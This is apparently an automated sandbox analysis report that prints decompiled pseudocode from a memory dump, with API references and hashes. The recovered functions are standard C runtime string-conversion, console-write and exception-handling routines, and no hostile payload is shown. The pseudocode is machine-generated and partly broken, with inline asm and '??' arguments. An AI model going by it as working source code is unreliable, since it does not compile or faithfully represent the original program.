								_t62 = L004B7C80(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0048B33A(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E004B3009(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							L0049DB40();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = L004B7C80(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E004B3009(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					L0049DB40();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x004b9738
0x004b9739
0x004b973a
0x004b9741
0x004b9745
0x004b9746
0x004b974c
0x004b9752
0x004b9758
0x004b975b
0x004b975b
0x004b975e
0x004b9760
0x004b9760
0x004b975e
0x004b9762
0x004b9767
0x004b976e
0x004b9771
0x004b9771
0x004b978d
0x004b9793
0x004b9798
0x004b992b
0x004b993e
0x004b979e
0x004b979e
0x004b97a1
0x004b97a6
0x004b97aa
0x004b97fe
0x004b97fe
0x004b9800
0x004b9802
0x004b9920
0x004b9920
0x004b9922
0x004b9923
0x00000000
0x004b9929
0x004b9813
0x004b9819
0x004b981b
0x00000000
0x00000000
0x004b9821
0x004b9833
0x004b9838
0x004b983c
0x00000000
0x00000000
0x004b9849
0x004b9883
0x004b9886
0x004b9889
0x004b988b
0x004b988d
0x004b988f
0x004b98db
0x004b98db
0x004b98dd
0x004b98dd
0x004b98df
0x004b9919
0x004b991a
0x00000000
0x004b991f
0x004b98f3
0x004b98f8
0x004b98fa
0x00000000
0x00000000
0x004b98fe
0x004b98ff
0x004b9900
0x004b9903
0x004b993f
0x004b9942
0x004b9905
0x004b9905
0x004b9906
0x004b9906
0x004b9913
0x004b9915
0x004b9917
0x004b9948
0x00000000
0x00000000
0x00000000
0x00000000
0x004b9917
0x004b9891
0x004b9894
0x004b9896
0x004b9898
0x004b989a
0x004b989d
0x004b98a2
0x004b98bd
0x004b98bf
0x004b98c9
0x004b98cb
0x004b98cc
0x004b98ce
0x00000000
0x00000000
0x004b98d0
0x004b98d6
0x004b98d6
0x00000000
0x004b98d6
0x004b98a4
0x004b98a6
0x004b98aa
0x004b98af
0x004b98b1
0x004b98b3
0x00000000
0x00000000
0x004b98b5
0x00000000
0x004b98b5
0x004b984b
0x004b9850
0x00000000
0x00000000
0x004b9856
0x004b9858
0x00000000
0x00000000
0x004b986f
0x004b9874
0x004b9878
0x00000000
0x00000000
0x00000000
0x004b987e
0x004b97b1
0x004b97b3
0x004b97b5
0x004b97bd
0x004b97dc
0x004b97de
0x004b97e8
0x004b97ea
0x004b97eb
0x004b97ed
0x00000000
0x00000000
0x004b97f3
0x004b97f9
0x004b97f9
0x00000000
0x004b97f9
0x004b97c1
0x004b97c5
0x004b97ca
0x004b97ce
0x00000000
0x00000000
0x004b97d4
0x00000000
0x004b97d4

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,wMJ,004A4D77,?,?,?,004B9984,00000001,00000001,EDE85006), ref: 004B978D
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004B9984,00000001,00000001,EDE85006,?,?,?), ref: 004B9813
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,EDE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004B990D
__freea.LIBCMT ref: 004B991A

Part of subcall function 004B3009: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BAEA8,00000000,?,004AB16D,?,00000008,?,004AD0C1,?,?,00000000), ref: 004B303B

__freea.LIBCMT ref: 004B9923
__freea.LIBCMT ref: 004B9948

Strings

wMJ, xrefs: 004B9745

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID: wMJ
API String ID: 1414292761-2099330561
Opcode ID: 6e91ce55d7b9ea4eba759cebaed16736688696507083eee6967a0cfd84de6117
Instruction ID: bd1046c0ed2026923ab6bb54f5f6b1936ba10a7c64732bc017e602d8fd777aa8
Opcode Fuzzy Hash: 6e91ce55d7b9ea4eba759cebaed16736688696507083eee6967a0cfd84de6117
Instruction Fuzzy Hash: 815102B2610206AAEF299E61DC41EFF77A9EF40754F14462EFE04D6240EB38DC50C6B8

Uniqueness

Uniqueness Score: -1.00%

Function 004C1550, Relevance: 10.8, APIs: 7, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004C1550(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = L004AEB21(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = L004AEB21(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E004B3009(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										L0049DB40();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E004B3009(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																L0049DB40();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E004B76FC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E0048B33A(_t130);
													}
												}
											}
										}
									}
								}
								E0048B33A(_t100);
							}
						}
					}
				}
				L63:
				return L0049CE1D(_v8 ^ _t132);
			}

0x004c1558
0x004c155f
0x004c1567
0x004c156a
0x004c1570
0x004c1573
0x004c1576
0x004c157a
0x004c157d
0x004c1582
0x004c15a9
0x00000000
0x00000000
0x00000000
0x00000000
0x004c1584
0x004c158c
0x004c158e
0x004c1592
0x004c1592
0x004c1597
0x004c15b5
0x00000000
0x00000000
0x00000000
0x00000000
0x004c1599
0x004c15a2
0x004c15b7
0x004c15b7
0x004c15bc
0x004c15c3
0x004c15c6
0x004c15c6
0x004c15cb
0x004c15d7
0x004c15e4
0x004c15f1
0x004c1604
0x00000000
0x004c1606
0x004c1608
0x004c163b
0x00000000
0x004c163d
0x004c163f
0x004c1643
0x004c1649
0x004c164c
0x004c164e
0x004c1651
0x004c1651
0x004c1656
0x00000000
0x00000000
0x004c1658
0x004c165c
0x004c1666
0x004c166b
0x00000000
0x004c166d
0x00000000
0x004c166d
0x004c166b
0x00000000
0x004c165c
0x004c1651
0x004c164c
0x00000000
0x004c1643
0x004c160a
0x004c160c
0x004c1610
0x004c1616
0x004c1619
0x004c161b
0x004c161b
0x004c1620
0x00000000
0x00000000
0x004c1622
0x004c1626
0x004c1630
0x004c1635
0x00000000
0x004c1637
0x00000000
0x004c1637
0x004c1635
0x00000000
0x004c1626
0x004c161b
0x004c1619
0x00000000
0x004c1610
0x004c1608
0x004c15f3
0x004c15f3
0x004c15f3
0x00000000
0x004c15f3
0x004c15e6
0x004c15e6
0x004c15e8
0x004c15d9
0x004c15d9
0x004c15db
0x004c15db
0x004c1672
0x004c1672
0x004c1672
0x004c167f
0x004c1685
0x004c168a
0x004c15ab
0x004c1690
0x004c1690
0x004c1698
0x004c169c
0x004c16f7
0x004c16f9
0x00000000
0x004c169e
0x004c16a3
0x004c16a5
0x004c16a7
0x004c16af
0x004c16d3
0x004c16d8
0x004c16dd
0x004c16e3
0x00000000
0x004c16e9
0x004c16e9
0x00000000
0x004c16e9
0x004c16b1
0x004c16b3
0x004c16b7
0x004c16bc
0x004c16be
0x004c16c3
0x004c17d8
0x004c17d8
0x004c16c9
0x004c16c9
0x004c16ef
0x004c16ef
0x004c16f2
0x004c16fc
0x004c16fe
0x00000000
0x004c1704
0x004c170c
0x004c171a
0x00000000
0x004c1720
0x004c1729
0x004c172f
0x004c1734
0x00000000
0x004c173a
0x004c173a
0x004c173d
0x004c1742
0x004c1746
0x004c1792
0x00000000
0x004c1748
0x004c174d
0x004c174f
0x004c1751
0x004c1759
0x004c1776
0x004c1780
0x004c1782
0x004c1785
0x00000000
0x004c1787
0x004c1787
0x00000000
0x004c1787
0x004c175b
0x004c175d
0x004c1761
0x004c1766
0x004c176a
0x004c17cc
0x004c17cc
0x004c176c
0x004c176c
0x004c178d
0x004c178d
0x004c1794
0x004c1796
0x00000000
0x004c17af
0x004c17af
0x004c17c8
0x004c17c8
0x004c1796
0x004c176a
0x004c1759
0x004c17d0
0x004c17d5
0x004c1734
0x004c171a
0x004c16fe
0x004c16c3
0x004c16af
0x004c17dc
0x004c17e2
0x004c168a
0x004c15cb
0x004c1597
0x004c17e4
0x004c17f7

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004C1829,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004C15FC
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004C1829,00000000,00000000,?,00000001,?,?,?,?), ref: 004C167F
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004C1829,?,004C1829,00000000,00000000,?,00000001,?,?,?,?), ref: 004C1712
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004C1829,00000000,00000000,?,00000001,?,?,?,?), ref: 004C1729

Part of subcall function 004B3009: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BAEA8,00000000,?,004AB16D,?,00000008,?,004AD0C1,?,?,00000000), ref: 004B303B

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004C1829,00000000,00000000,?,00000001,?,?,?,?), ref: 004C17A5
__freea.LIBCMT ref: 004C17D0
__freea.LIBCMT ref: 004C17DC

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 8594071d75b3d6465a6524f638df9d1b563f8c660d840a62bc252938c85d4b90
Instruction ID: 44fc87c9e4fce8afed5c7352c9580838a9c51b877b8b6f8364260b020abfb39a
Opcode Fuzzy Hash: 8594071d75b3d6465a6524f638df9d1b563f8c660d840a62bc252938c85d4b90
Instruction Fuzzy Hash: 7591B379E01206ABDB609EA5C881FEF7BA59F4A314F18456FE801E6262D638DC41C768

Uniqueness

Uniqueness Score: -1.00%

Function 004B6718, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004B6718(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_t9 = _t116 + 0x18; // 0x6e7501a8
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4ee718 + _t118 * 4)) + _t9));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4ee718 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E004AE428(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4ee718 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4ee718 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x4ee718 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E004B3151( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E004B3151();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0x56ec8b55
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return L0049CE1D(_v8 ^ _t136);
			}

0x004b6720
0x004b6727
0x004b672a
0x004b6732
0x004b6736
0x004b6742
0x004b6745
0x004b6748
0x004b674b
0x004b674f
0x004b6757
0x004b675a
0x004b6760
0x004b6766
0x004b676b
0x004b676d
0x004b6770
0x004b6775
0x004b677f
0x004b6786
0x004b6789
0x004b6790
0x004b6797
0x004b67c3
0x004b67e9
0x004b67eb
0x00000000
0x004b67c5
0x004b67c8
0x004b688f
0x004b689b
0x004b68a6
0x004b68ab
0x004b67ce
0x004b67d5
0x004b67da
0x004b67e0
0x004b67e6
0x00000000
0x004b67e6
0x004b67e0
0x004b67c8
0x004b6799
0x004b679d
0x004b67a0
0x004b67a6
0x004b67a8
0x004b67ab
0x004b67af
0x004b67ec
0x004b67ef
0x004b67f0
0x004b67f5
0x004b67fb
0x004b6801
0x004b6810
0x004b6816
0x004b681c
0x004b6821
0x004b683d
0x004b68b0
0x004b68b6
0x004b683f
0x004b683f
0x004b6847
0x004b6850
0x004b6856
0x00000000
0x004b6858
0x004b685a
0x004b685d
0x004b6876
0x00000000
0x004b6878
0x004b687c
0x004b687e
0x004b6881
0x00000000
0x004b6881
0x004b687c
0x004b6876
0x004b6856
0x004b6850
0x004b683d
0x004b6821
0x004b67fb
0x00000000
0x004b6884
0x004b6884
0x004b68b8
0x004b68ca

APIs

GetConsoleCP.KERNEL32(004AA674,00000001,?,?,?,?,?,?,?,004B6E8D,0000000C,00000001,004AA674,00000020,004AA674,004AA674), ref: 004B675A
__fassign.LIBCMT ref: 004B67D5
__fassign.LIBCMT ref: 004B67F0
WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,004AA674,00000005,00000000,00000000), ref: 004B6816
WriteFile.KERNEL32(?,004AA674,00000000,004B6E8D,00000000,?,?,?,?,?,?,?,?,?,004B6E8D,0000000C), ref: 004B6835
WriteFile.KERNEL32(?,0000000C,00000001,004B6E8D,00000000,?,?,?,?,?,?,?,?,?,004B6E8D,0000000C), ref: 004B686E

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3bb653def771f6aa2afe6261a84049ce6ef4f84dfbfec45f0a3a240a76bb45c5
Instruction ID: 706712e0d214dcb1100ca22294e7220c69245bfb3051cdde640d22d49023a79d
Opcode Fuzzy Hash: 3bb653def771f6aa2afe6261a84049ce6ef4f84dfbfec45f0a3a240a76bb45c5
Instruction Fuzzy Hash: A751A5B1900249AFDB10CFA8D885AEEBBF8EF09300F15416BE955E7351D7399941CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004A0D00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E004A0D00(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				intOrPtr _t82;
				signed int _t85;
				char _t87;
				intOrPtr _t91;
				intOrPtr* _t92;
				signed int _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t106;
				signed int _t108;
				void* _t111;
				void* _t112;
				void* _t118;

				_t79 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E004C4352(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t106 = _t6;
				_push(_t106);
				_v20 = _t106;
				_v12 =  *(_t80 + 8) ^  *0x4eb018;
				E004A0CC0( *(_t80 + 8) ^  *0x4eb018);
				E004A222C(_a12);
				_t56 = _a4;
				_t112 = _t111 + 0x10;
				_t103 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t103 - 0xfffffffe;
					if(_t103 != 0xfffffffe) {
						E004A23E0(_t80, 0xfffffffe, _t106, 0x4eb018);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t103 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t85 = _v12;
							_t63 = _t103 + (_t103 + 2) * 2;
							_t82 =  *((intOrPtr*)(_t85 + _t63 * 4));
							_t64 = _t85 + _t63 * 4;
							_t86 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t87 = _v5;
								goto L7;
							} else {
								_t65 = E004A2390(_t86, _t106);
								_t87 = 1;
								_v5 = 1;
								_t118 = _t65;
								if(_t118 < 0) {
									_v16 = 0;
									L13:
									_push(_t106);
									E004A0CC0(_v12);
									goto L14;
								} else {
									if(_t118 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x404578;
											if(__eflags != 0) {
												_t75 = E004C3C30(__eflags, 0x404578);
												_t112 = _t112 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t108 =  *0x404578; // 0x4a1196
													 *0x4f02b4(_a4, 1);
													 *_t108();
													_t106 = _v20;
													_t112 = _t112 + 8;
												}
												_t66 = _a4;
											}
										}
										E004A23C4(_a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t103;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t103) {
											E004A23E0(_t68, _t103, _t106, 0x4eb018);
											_t68 = _a8;
										}
										_push(_t106);
										 *((intOrPtr*)(_t68 + 0xc)) = _t82;
										E004A0CC0(_v12);
										E004A23A8();
										asm("int3");
										_t70 = _v40;
										_t91 = _v36;
										__eflags = _t70 - _t91;
										if(_t70 != _t91) {
											_t92 = _t91 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t99 =  *_t71;
												__eflags = _t99 -  *_t92;
												if(_t99 !=  *_t92) {
													break;
												}
												__eflags = _t99;
												if(_t99 == 0) {
													goto L24;
												} else {
													_t100 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t100 -  *((intOrPtr*)(_t92 + 1));
													if(_t100 !=  *((intOrPtr*)(_t92 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t92 = _t92 + 2;
														__eflags = _t100;
														if(_t100 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t103 = _t82;
						} while (_t82 != 0xfffffffe);
						if(_t87 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x004a0d07
0x004a0d0c
0x004a0d12
0x004a0d1e
0x004a0d20
0x004a0d26
0x004a0d26
0x004a0d2f
0x004a0d31
0x004a0d34
0x004a0d37
0x004a0d3f
0x004a0d44
0x004a0d47
0x004a0d4a
0x004a0d51
0x004a0dad
0x004a0db0
0x004a0dbf
0x00000000
0x004a0dbf
0x00000000
0x004a0d53
0x004a0d53
0x004a0d59
0x004a0d5f
0x004a0d65
0x004a0dd0
0x004a0dd9
0x004a0d67
0x004a0d67
0x004a0d67
0x004a0d6d
0x004a0d70
0x004a0d73
0x004a0d76
0x004a0d79
0x004a0d7e
0x004a0d94
0x00000000
0x004a0d80
0x004a0d82
0x004a0d87
0x004a0d89
0x004a0d8c
0x004a0d8e
0x004a0da4
0x004a0dc4
0x004a0dc4
0x004a0dc8
0x00000000
0x004a0d90
0x004a0d90
0x004a0dda
0x004a0ddd
0x004a0de3
0x004a0de5
0x004a0dec
0x004a0df3
0x004a0df8
0x004a0dfb
0x004a0dfd
0x004a0dff
0x004a0e0c
0x004a0e12
0x004a0e14
0x004a0e17
0x004a0e17
0x004a0e1a
0x004a0e1a
0x004a0dec
0x004a0e22
0x004a0e27
0x004a0e2a
0x004a0e2d
0x004a0e39
0x004a0e3e
0x004a0e3e
0x004a0e41
0x004a0e45
0x004a0e48
0x004a0e58
0x004a0e5d
0x004a0e61
0x004a0e64
0x004a0e67
0x004a0e69
0x004a0e6f
0x004a0e72
0x004a0e72
0x004a0e75
0x004a0e75
0x004a0e77
0x004a0e79
0x00000000
0x00000000
0x004a0e7b
0x004a0e7d
0x00000000
0x004a0e7f
0x004a0e7f
0x004a0e82
0x004a0e85
0x00000000
0x004a0e87
0x004a0e87
0x004a0e8a
0x004a0e8d
0x004a0e8f
0x00000000
0x004a0e91
0x00000000
0x004a0e91
0x004a0e8f
0x004a0e85
0x00000000
0x004a0e7d
